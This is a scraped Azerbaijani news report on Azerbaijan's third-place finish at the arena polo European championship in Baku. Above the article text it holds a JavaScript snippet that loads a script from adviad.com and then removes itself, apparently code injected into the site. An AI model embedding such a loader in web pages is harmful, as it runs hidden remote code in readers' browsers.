Azərbaycan komandası Bakıda keçirilən arena polo üzrə Avropa çempionatında üçüncü yeri tutub – FOTO

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Sentyabrın 18-də Bakıda keçirilən arena polo üzrə Avropa çempionatında üçüncü yer uğrunda oyun keçirilib.

AZƏRTAC xəbər verir ki, görüşdə Azərbaycan komandası İsveçrə yığmasına 7,5:3 hesabı ilə qalib gələrək yarışı fəxri kürsünün üçüncü pilləsində başa vurub.

Binə Atçılıq Mərkəzində keçirilən qitə çempionatında Azərbaycan, Avstriya, İsveçrə və İspaniyanın polo komandaları iştirak edirlər.

Azərbaycan Atçılıq Federasiyası, Avropa Polo Federasiyası və Beynəlxalq Polo Federasiyasının təşkilatçılığı ilə keçirilən yarışda bu gün, həmçinin final matçı təşkil olunacaq. Həlledici qarşılaşmada isə İspaniya və Avstriya komandaları Avropa çempionu titulu uğrunda mübarizə aparacaqlar.

Final görüşündən sonra qaliblərin mükafatlandırılması mərasimi olacaq.

Qeyd edək ki, sentyabrın 14-də start verilən qitə çempionatında Azərbaycan millisi yarışda Avstriya poloçularını məğlub edib. Sentyabrın 16-da İspaniya komandası ilə görüşdə rəqib üstün olub. Dünən gərgin idman mübarizəsi şəraitində keçmiş yarımfinal matçında isə yığmamız İsveçrəyə qalib gəlib.

Yığmamızın heyətində Elçin Camallı, Andres Fernandez Lorente, Fabian Bolanterio, Aqustin Kronhaus, Əli Rzayev və Tərlan Qurbanəliyev yer alıb.

Xatırladaq ki, Azərbaycan Respublikası Atçılıq Federasiyası 2013-cü ildən Beynəlxalq Polo Federasiyasının üzvüdür. 2015-ci ildəki ilk qitə çempionatına da Bakı ev sahibliyi edib. Həmin yarış Azərbaycan komandasının qələbəsi ilə yekunlaşıb.

Oxu.az

Bu yazılara da göz atın...